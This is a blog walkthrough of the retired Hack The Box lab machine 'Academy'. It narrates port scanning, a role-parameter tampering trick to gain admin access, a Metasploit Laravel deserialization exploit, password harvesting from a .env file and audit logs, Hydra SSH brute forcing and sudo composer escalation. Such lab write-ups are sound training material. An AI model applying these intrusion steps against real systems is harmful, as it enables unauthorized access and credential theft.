Hack The Box — Academy

Introduction

Hello there! Thank you for taking the time to read my write-up of the recently retired machine Academy, from Hack The Box.

Academy is an Easy Linux machine that requires careful enumeration to complete.

What will be covered:
• Nmap
• Metasploit
• Credential Abuse
• GTFOBins

With that out of the way let’s get into it!

Scanning

To start things off, a Nmap scan is run on all 65,535 TCP ports in order to discover services that are reachable from the Internet. This is crucial step in any engagement because it allows the tester to get an idea of what type of system the target is. This process can also help in identifying potentially vulnerable services running on the host. This scan was run with the -sC -sV -T4 -v -p- flags set. The -oN flag outputs the scan to the nmap directory in.nmap format.

The scan reports three ports open on the host: 22, 80, and 33060. Nmap reveals a redirect to http://academy.htb/ on port 80 so I added academy.htb to the /etc/hosts file.

Web Application

The first thing I do is visit http://academy.htb/ to check out the site. There are two options on the main page: Login and Register. Hovering over the links reveals http://academy.htb/login.php and http://academy.htb/register.php.

I visit http://academy.htb/login.php first and try the username and password combination of admin:admin. The login works and the redirect lands on http://academy.htb/home.php.

After clicking around for a little bit I come to the conclusion that there is nothing of real interest here. The user that is logged in is egre55, so I take note of that and move onto http://academy.htb/register.php. This time I send the requests through Burp Suite.

I notice the roleid=0 right away, so I changed that to a 1 and sent the request forward. I revisit http://academy.htb/login.php logging in with test:test and I get the same results as before. I just happened to guess http://academy.htb/admin.php just checking things out and sure enough I get a login page. I try my created account test:test on it and I get logged in!

There is some valuable information that can be gathered from this page. The first thing I noticed was the dev-staging-01.academy.htb. I’ll add that to /etc/hosts file and keep moving. The next thing I gather from this page is the two additional usernames cry0l1t3 and mrb3n. Moving forward, I check out http://dev-staging-01.academy.htb/.

Poking around the development area, I found some more sensitive information.

Foothold

A quick Google search of “laravel exploit” brings me to an Exploit Database entry for a Metsaploit module that exploits a Token Unserialize Remote Command Execution vulnerability in Laravel PHP Framework 5.5.40 / 5.6.x < 5.6.30.

I fire up Metasploit Framework by executing msfconsole -q in the terminal. After running search laravel I am greeted with the module exploit/unix/http/laravel_token_unserialize_exec. I set all of the appropriate options before running the exploit.

Post-Exploitation

The shell lands as the www-data user. I make the shell more interactive by entering python3 -c ‘import pty;pty.spawn(“/bin/bash”)’. After doing some enumeration in the directory where the shell landed, I decided to move on. I change into the /var/www/html/academy directory and run ls -la.

The first thing that stands out to me is the .env file. I run cat .env and expose another potential password.

I then add the usernames and the password I collected to files and run Hydra to see if I can get a valid login on SSH.

user.txt

I get the credentials for the cry0l1t3 user. Now that I know I have a valid username and password combination for SSH, I’ll login to get a better shell. At this point, I am able to get the user.txt flag.

As part of my standard methodology when working through Hack The Box machines is to automate some of the enumeration by using LinPEAS from the Privilege Escalation Awesome Suite. I change into the /tmp directory and run wget to transfer the file.

Lateral Movement

As the script is running, an interesting discovery is made. Checking the audit logs reveals the su password for the mrb3n user. It is common to find passwords in audit logs because users will mistakenly enter their password as a username.

Running su mrb3n will switch from the current cry0l1t3 user to mrb3n.

The mrb3n user has the sudo privilege enabled which will allow me to escalate to the root user.

root.txt

I know that the mrb3n user has the sudo privilege from previous enumeration of the system. Running sudo -l reveals that /usr/bin/composer can be used to run as the root user.

A quick search on https://gtfobins.github.io/ reveals sudo privilege escalation instructions.

I simply copy and paste this into my notes, add the full path for composer, and paste it into the terminal session.

As a result, I am able to get the root.txt flag and complete the challenge! Again, thank you for taking the time to read this and stay tuned for more!

--

--

--

Cybersecurity Professional

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

RAILGUN Weekly Update, May 23, 2022

RAILGUN Weekly Update, April 18, 2022

Misconceptions of Network Safety Regarding Remote and Hybrid Work

PWN Tips && Tricks — LINUX

{UPDATE} The Nightmare Maze Hack Free Resources Generator

{UPDATE} 放烟花Fireworks Hack Free Resources Generator

Bitwarden Password Manager — Real Review

Now, That’s Funny!

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Mason Schmidt

Mason Schmidt

Cybersecurity Professional

More from Medium

TryHackMe — Network Services — SMB

What is a Cyber Attack?

A bad Combination: Unprivileged Remote Code Execution and privileged File Write

Dark Side 126: Intro to Log4j